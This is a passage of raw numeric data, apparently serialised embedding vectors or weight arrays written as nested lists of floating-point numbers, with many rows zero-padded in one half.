-0.232078, -0.893765, 1.19002, 0.0141502, -0.762578, 0.904532, -0.665731, -0.418342, 1.46862, -0.836438, 0.282222, 0.919507, 0.456595, 0.45466, 0.413528, -0.997622, -0.522531, 0.654409, 0.0382136, -0.314546, 0.170898, 0.0910164, -0.518975, 0.810974, -0.779954, 0.504257, -0.257688, -0.03182, 0.120462, 0.939954, 0.178612, -0.195595, 0.79342, -0.761574, -0.150073, -0.0227754, 1.35044, 0.0408023, -0.28902, 0.577161, -0.63545, -0.0696449, -1.54035, -0.927226, -0.313917, -0.00705289, -0.079193, 0.647927, 0.543759, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.163935, -0.0565751, -0.295327, 1.02969, 0.337056, 0.201611, -0.588762, 0.123321, 0.22475, -0.279728, 0.35704, 0.132568, 1.43816, -0.372129, -0.802506, -0.0410776, -0.0263218, 1.26319, -0.50177, 0.373575, -0.207289, 1.87266, -0.0543133, 2.51486, -0.0880487, 0.226463, -0.159071, 1.07884, -0.0134695, 0.187339, -0.266648, 1.76296, -0.412556, -0.0733093, -0.164695, -0.046113, 0.356709, 0.144846, -0.180595, -0.0451341, 0.255264, 0.0997823, 1.04155, -0.265623, 0.0319825, 2.40253, 0.021422, -0.0420001, 0.05654, 1.06995, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1908, -0.007584, -0.09204, 1.093, 0.3171, -2.373, 0.2347, -0.1373, 0.63, 1.445, -0.117, -0.1344, -0.4495, -0.833, 0.6733, 0.1968, -0.1493, 0.6304, -0.003056, 0.747, -0.02794, 0.805, 0.321, 0.3708, 0.4192, 0.0776, -0.4688, -0.251, -0.00977, 0.596, 2.355, 1.077, -0.6753, -0.1116, -1.053, 0.4868, -0.0539, 0.837, 0.1715, 0.5454, -0.1925, 1.032, 0.1533, -1.154, -0.04285, 0.3127, 0.0443, 0.02869, -0.7974, 0.4727], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.881, -1.627, -0.652, -0.352, 0.3787, -0.07697, 0.2102, 0.1917, 0.1071, -0.0713, 0.6055, 0.4006, 0.9404, 0.05225, -1.089, -0.356, -0.2238, 1.117, -0.7183, 1.135, -0.2788, 0.552, 0.4956, 0.5713, -0.2421, 0.1005, -1.187, 0.0881, -0.02892, 0.0509, 1.832, 0.686, -0.3992, 0.11444, 0.8896, -0.04907, -0.5664, -0.5723, 0.1434, -1.144, -0.729, 0.05862, 0.7437, 0.1675, 0.8027, 0.9497, -0.02495, 0.2852, -0.1688, 0.6265], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2238, 1.732, -0.3337, 0.09924, 0.1293, 0.5054, 0.1187, -0.0811, -0.2676, 0.1572, 0.3337, 0.1682, -0.501, -0.07166, 0.1749, -0.01923, -0.1411, 0.7144, -0.873, -0.324, -0.07623, -0.5825, -0.4202, 0.0748, -0.0944, 0.1337, 0.5312, 0.1559, -0.04578, -1.472, -0.1957, -0.9004, -0.2416, 0.03827, -0.2415, -0.643, 0.87, -0.8916, -0.3142, 0.4495, 0.08765, 0.04156, -0.1963, 0.1818, 0.1709, -0.683, -0.01816, 0.285, -0.05426, -1.104], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.1455, 0.08185, -0.2251, 1.18, -0.908, -0.0703, 0.974, 2.05, 0.2563, 0.5215, -0.1821, 0.01854, 0.2954, 0.8076, -1.577, -1.35, -0.042, 1.152, -0.1656, -0.543, 0.855, 0.1527, -0.2534, 0.0881, -0.4653, 0.1971, 0.629, 1.279, 0.003893, 0.33, -3.234, -0.4287, -0.3503, 0.851, 0.951, 0.01241, 0.503, 1.387, -0.2275, -0.1556, 0.8745, 0.971, 0.0988, -0.3174, 0.1014, -0.03128, -0.01678, 0.915, -0.2761, -0.1515], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5864, -0.01252, 0.34, 1.762, -0.488, -0.5703, 0.2874, -0.05316, 0.11884, -0.625, 0.976, 0.05594, -0.2255, -0.412, -1.098, -0.272, 0.8315, 1.176, -0.255, -0.7627, -0.835, -1.058, -0.933, 0.1058, -0.2576, -0.3755, 0.1722, 0.519, -0.00605, -0.1203, 0.5845, 0.3657, -0.1395, -1.036, -0.3198, -0.1332, -0.1512, -0.07355, -0.249, 0.126, 0.1658, -0.1366, -0.4392, -0.5083, -0.02188, -0.2289, 0.03787, 0.02509, 1.513, -0.2377], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4556, 0.00346, -0.595, 0.514, -0.4133, 0.006268, 0.3396, -0.459, 0.1738, -0.1256, 0.522, 0.3015, 0.399, 0.2167, 0.912, -0.8477, -0.3003, 0.5005, -0.1268, -0.906, 1.424, -0.005733, 0.3542, -0.143, -0.641, 0.2979, 0.3586, 0.885, 0.01238, -0.02823, -1.535, -0.135, 0.589, -0.782, 0.1561, -0.434, 1.295, -3.635, 0.2583, -0.2085, -0.7734, -0.2239, -0.2019, -0.954, -0.0601, -0.3906, 0.009674, -0.6206, -0.1514, 0.059], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1383, -0.07135, -1.177, -0.316, 0.1508, 0.0462, -0.3386, -0.1744, 0.2842, -0.1903, -1.296, 0.1084, 0.1466, -0.1908, 0.2822, -0.01738, 0.7207, -0.429, -0.2184, -0.2625, 0.1848, -0.7065, 0.203, -0.00222, -0.4224, 0.5093, -0.00799, 0.0755, 0.02489, -0.1037, 0.3643, 0.641, 0.4626, -0.206, -0.8804, -0.09216, 0.04147, -2.068, 0.0256, -0.8774, 0.1131, 0.1294, 0.493, 0.1085, -0.1755, 0.1505, -0.00118, -0.0897, -0.4094, -0.07227], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.508, -0.0515, 0.5522, -1.418, 0.0554, 0.532, 0.1646, -0.0977, -0.5264, -1.256, -1.189, 0.07025, -0.2314, -0.2837, 0.582, -0.04376, 1.068, 0.767, -0.653, 0.01727, 0.558, 0.515, 0.8706, -0.04813, -0.7563, -0.8696, 0.3726, 0.1865, 0.00375, 0.1926, -3.38, 0.129, 0.3625, -0.39, 1.486, -0.1082, -0.4001, -0.4934, 0.1533, -0.1248, -1.137, -0.2964, -0.0316, 0.9233, 1.075, 0.1871, -0.0263, -1.31, -0.2993, 0.1857], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2664, -0.1221, 0.02196, -1.07, -0.1368, -0.04895, 1.231, -0.332, 0.09686, -0.1271, -0.3167, -0.0645, 0.1328, 0.4731, 0.7563, 0.3542, 0.03683, 0.8916, -0.9775, -0.912, 0.1484, -1.061, -0.1279, 0.05426, 0.2878, 0.0512, -0.676, -0.7803, 0.02919, 0.02614, 0.4346, 0.941, -1.545, 0.0638, -0.12177, -0.2766, 0.717, 0.1414, -0.1552, 0.03015, 0.02509, 0.3623, -0.3555, -0.1729, 0.4016, -0.287, 0.02531, 0.7104, -0.1436, 0.1455], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.668, -0.6494, 0.4067, -0.89, -1.323, 1.0625, 0.7954, -1.8125, -1.628, -2.09, 0.2986, -0.5527, -1.822, -0.5474, 0.721, 0.7935, 0.607, -0.2307, 0.001179, 1.155, -0.2091, -0.564, -0.2158, -0.1797, 0.06555, 0.2089, -0.954, -0.4832, -0.003439, 0.2468, 1.696, 2.227, -1.667, -0.4382, -0.2343, -0.3582, -1.356, 0.2126, -0.418, -0.7495, 0.043, -2.27, 2.146, 0.812, -1.504, -0.2015, -0.03006, 0.2532, 1.28, 0.2317], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.676, -0.02301, -0.892, 0.1954, -0.555, 0.2583, -0.54, -0.4595, 0.2456, 1.301, -0.1587, 0.1837, -0.06183, -0.0952, 0.4343, -0.471, -0.1519, 1.582, 0.1969, 1.854, -0.3206, 0.557, -0.0609, -0.0589, -0.6772, 0.3413, -0.2312, 0.6665, 0.00458, -0.0783, -0.7866, 0.98, 0.803, 0.5747, -0.1244, 0.4482, 0.524, -0.8896, 0.0917, 0.0712, -0.8174, -0.1583, -0.645, -0.3428, 0.654, -0.0853, 0.04306, -0.4163, -0.3438, 0.2142], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0501, 0.06085, -0.6377, 0.01707, 0.07874, -0.10626, 0.3792, 0.4456, 0.1545, 0.11743, -1.059, -0.3345, 0.2246, -0.2588, -0.793, -0.3176, -0.4988, 0.5845, -0.2808, -0.2194, 0.353, 0.10315, 0.9, -0.013824, -0.3164, 0.2168, -0.6294, 0.0895, -0.0286, -0.481, 0.11536, -0.2554, -0.4617, 0.064, 0.9165, 0.212, -0.05167, 0.2585, 0.279, -0.003763, -0.4233, -0.09283, 0.0353, -0.1153, 0.6167, -0.2556, 0.012726, -0.198, 0.04657, -0.455], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2086, 0.06805, 0.03021, 0.8955, 0.665, 0.4304, -1.27, -0.2957, 0.3245, 0.6196, 0.548, -0.2966, -0.6875, -0.1338, 0.6357, -0.3416, -0.3772, -0.1886, 1.84, 0.1061, -0.1863, 1.592, -0.0991, -0.02574, 0.9097, -0.159, -0.712, 0.9263, 0.01224, -0.4836, 1.318, 0.742, 0.26, 0.594, -1.167, -0.1214, -0.08203, 0.2046, 0.4287, 0.5933, 0.8423, -0.44, -0.6855, -0.1324, -0.2045, 0.1859, -0.02402, -0.7183, 0.596, 0.09906], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5674, -0.4055, -1.802, -0.3093, 0.906, 0.529, -0.2302, -0.02666, 0.0721, 0.932, -1.396, -0.2937, 0.299, -0.628, 0.2222, -0.2225, -1.237, 1.637, 0.303, -1.345, 0.569, 0.4915, 0.01416, 0.5977, -0.0124, -0.983, -0.2007, 0.913, 0.00718, -0.1686, -2.06, 0.9404, -0.6655, -1.044, -0.4756, 0.9165, 0.5874, 0.4607, 0.04135, 1.264, 0.3257, 0.1693, -0.1348, -0.507, 0.003403, -0.8535, -0.001388, -1.0, 1.286, -0.039], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2076, 0.04248, -0.4966, -0.958, 0.11053, 0.04303, -0.5815, -0.3816, -0.1367, -0.4353, -0.4016, 0.05072, -0.12476, -0.0937, 1.694, 0.1917, 1.382, 0.4656, 0.3816, 0.6436, -0.09503, -0.0053, 0.398, -0.01151, 0.06854, -0.3489, 0.2664, 0.3306, -0.04526, 0.12476, 0.0681, 0.3232, 0.5, -0.197, -0.0836, 0.1589, 0.631, 0.4001, -0.4116, 0.1348, -0.191, -1.015, -0.692, 1.021, -0.856, -0.2976, -0.01785, -1.164, -0.4849, 0.1417], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00819, -0.03482, 0.03894, -0.01996, -0.02843, -0.053, -0.04437, 0.02979, -0.0424, -0.000883, -0.03397, -0.04437, -0.04144, -0.0251, 0.001617, -0.01944, -0.03018, -0.003496, -0.041, -0.00391, 0.00506, 0.02684, 0.01434, -0.02122, 0.01299, -0.001869, -0.008316, 0.02098, -0.02208, -0.000146, -0.05084, -0.02834, -0.04208, -0.02493, 0.03494, 0.02783, 0.0231, -0.04254, 0.0367, -0.01837, -0.05023, 0.02245, -0.0003963, 0.01447, -0.02608, 0.03436, 0.01253, 0.01566, -0.0228, 0.01245], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1855, -0.02951, 0.668, 1.292, 0.006313, -3.906, -0.1854, -0.3755, -0.9985, 0.3162, -0.884, -0.009865, -0.781, -0.01244, -1.267, 0.5464, -0.312, 0.2732, -0.2117, -0.5864, 0.3071, 1.579, -0.64, 0.0422, -0.03387, -0.498, 0.2957, -0.1315, 0.02008, 0.11395, 1.436, 1.866, 0.02809, -0.3967, 0.4558, -0.013145, -0.1362, 0.09424, 0.898, 0.8804, 0.07007, -0.4119, 1.42, -0.1256, 0.2722, 0.2522, 0.007168, -0.07587, 0.6, 0.1572], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -3.264, 0.07104, 0.2338, -6.613, 0.0804, -0.02171, -0.1943, 0.535, 0.3655, -2.62, 0.2429, -0.09265, -0.2515, 0.711, 1.082, -1.48, -0.11316, 1.269, 0.735, 2.902, -0.1225, 0.2034, -0.1562, 0.01953, -0.599, 0.646, -2.014, 1.46, -0.02917, 0.1081, -0.004784, 3.0, -2.07, 0.531, -0.4614, -0.1879, -0.2438, -0.3428, 0.1312, -0.02666, 0.007652, -2.488, -0.4756, -0.06216, 0.1371, -0.1206, 0.02316, -0.08386, -1.666, 0.2407], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2656, -0.1437, -0.5996, -0.4602, 1.157, 0.1396, 0.365, 0.7783, 0.5464, -0.2388, -0.711, -0.079, 0.02847, 0.0857, 0.541, 0.03604, 0.4988, 1.179, -0.0748, 0.2465, -0.3967, 1.449, -0.1624, -0.3818, -0.586, 0.808, -1.455, -0.3008, 0.0619, 0.456, 0.5933, 0.5366, -0.7085, 0.1057, -0.362, 0.811, -0.599, -0.387, -0.3086, 1.513, 0.2612, -1.673, 0.829, 0.10974, 0.2766, -0.346, -0.04254, 0.4868, -0.04733, 0.71], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1926, 0.118, 0.01654, 1.534, 0.329, -0.2458, 0.8726, 0.6284, 0.10486, -1.196, 0.3376, 0.1753, 0.5146, -0.3398, -1.223, -0.314, -0.155, -0.53, -0.0363, -0.9233, 0.4001, -0.811, 0.1509, 0.152, -0.7485, 0.3176, -0.1676, 0.02672, -0.007313, -0.1943, -0.1318, 0.0616, 0.05328, -1.033, 0.1263, 0.3132, -0.1571, 0.738, 0.2502, -0.294, -0.1907, -0.0491, -0.264, 0.0274, -0.06198, 0.3853, -0.04056, -0.0924, -0.38, 0.10724], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1617, 0.2039, 0.6406, 1.703, 0.04742, -0.1367, -0.0511, 1.435, 0.648, -1.077, 0.4607, 0.752, 0.1703, -0.1499, -0.822, 3.51e-05, 0.761, 0.02852, -0.3777, 1.111, 0.1489, -0.09094, 0.1705, 0.03992, -1.467, 0.1189, -0.1915, 0.1099, -0.03745, 0.02507, -3.28, -0.1606, 0.495, -1.659, 0.607, -0.04315, 0.4773, -0.1887, -0.5728, -0.2085, -0.955, 1.055, -0.544, 0.05344, 0.2006, 0.1271, -0.0319, -1.084, -1.033, 0.1261], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1882, -0.4114, -0.8965, -0.7036, 0.2407, -0.5996, -0.509, -0.4229, 0.5537, -0.3613, -1.449, -0.0844, 0.2191, 0.525, 0.3096, -0.1942, 0.133, 0.625, 0.3782, -0.6064, 0.1498, 1.229, -0.0348, 0.9053, -0.3394, 0.1031, -0.2236, 0.143, 0.04932, 0.1478, -0.53, 0.632, 0.1316, 0.9126, -0.2102, 0.185, -0.2722, -0.4983, 1.045, -0.06976, 0.618, -0.4229, -0.0768, -0.0735, 0.271, 0.0662, -0.02477, -0.0854, -0.167, 0.8843], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0717, -0.03214, 0.9956, 1.651, 0.4485, -0.2668, -0.28, -0.2957, -0.02747, 0.894, 0.4421, -0.04596, -0.2473, -0.286, 0.3596, 0.1626, 0.10175, -2.027, 0.2493, -0.2659, 0.607, 3.777, -0.3904, -0.1945, -0.2455, 0.0586, -0.0895, 0.3435, -0.01689, 0.665, -1.171, 0.311, 0.3232, -0.7915, 0.2595, 1.238, -0.2886, -0.6934, -0.656, 1.535, 0.12494, 0.4124, 1.45, 0.9297, -0.412, 0.8857, 0.010605, -0.2954, -0.461, 0.8276], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.002138, -0.01773, -0.03723, 0.0355, -0.03796, 0.01174, -0.01219, 0.0376, -0.0119, -0.03345, -0.00827, -0.02162, -0.0438, 0.0204, -0.003004, -0.03214, -0.010864, 0.0342, 0.0397, -0.01329, 0.0281, -0.01305, 0.00796, -0.02695, -0.05264, -0.014755, 0.03082, -0.0548, 0.001579, -0.02927, -0.03537, -0.04486, -0.0169, -0.00567, -0.004307, -0.0435, -0.04276, -0.02019, 0.0287, -0.013954, -0.05762, -0.0459, 0.02869, -0.05243, -0.02156, 0.03305, 0.03525, 0.01255, 0.02452, -0.05103], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0301, -0.04053, 0.0108, 0.0401, 0.01903, 0.03244, -0.00485, -0.001634, -0.013824, -0.04797, -0.03592, -0.0273, -0.03824, -0.03113, -0.05908, 0.02681, -0.03934, 0.03934, 0.015366, -0.0391, 0.007004, 0.01144, -0.007812, -0.01192, -0.04156, -0.0206, -0.05612, 0.03235, -0.03754, 0.01854, 0.04153, -0.04947, -0.04813, 0.03137, 0.01125, -0.0092, -0.0558, 0.003317, -0.01226, -0.0273, -0.02608, 0.0349, -0.0006857, -0.02965, -0.00941, -0.03723, -0.02367, 0.01147, -0.0342, -0.01665], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1343, -0.2502, 0.624, -0.73, 0.348, 0.7935, -0.1227, -1.567, -0.5845, -0.6987, -0.2666, -0.338, 0.4604, 0.8643, 0.999, 0.4104, -1.167, -1.517, 0.2063, 0.5625, 0.4854, -0.8203, -0.337, 0.0236, 0.2465, 0.735, 0.07654, -0.587, 0.0359, 0.264, 1.626, -1.081, -0.2113, 0.2876, 0.76, -0.06934, -0.4355, 0.7227, -0.1683, -0.3984, -0.12335, 